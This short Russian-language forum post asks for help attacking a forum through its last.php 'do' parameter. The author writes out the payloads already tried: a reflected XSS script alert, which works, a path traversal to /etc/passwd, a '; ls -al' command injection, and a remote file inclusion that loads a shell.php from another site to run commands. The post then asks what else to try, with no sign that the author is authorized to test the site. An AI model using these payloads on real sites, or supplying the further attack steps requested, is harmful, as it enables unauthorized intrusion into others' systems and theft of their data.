Прошу объяснить мне такую вещь.
Есть форум, и там можно в url прописать
http://forum/last.php?do=<script>alert()</script>
и выскакивает alert. Прбовал ../../../etc/passwd
неработает, пробовал еще
http://forum/last.php?do=test; ls -al
тоже не работает. Вставлял ссылку на другой сайт
http://forum/last.php?do=http://site/shell.php?c=pwd
Страница не загружается и в строке состояния пишется done. Подскажите что можно еще делать, или мож я что-то не правильно сделал.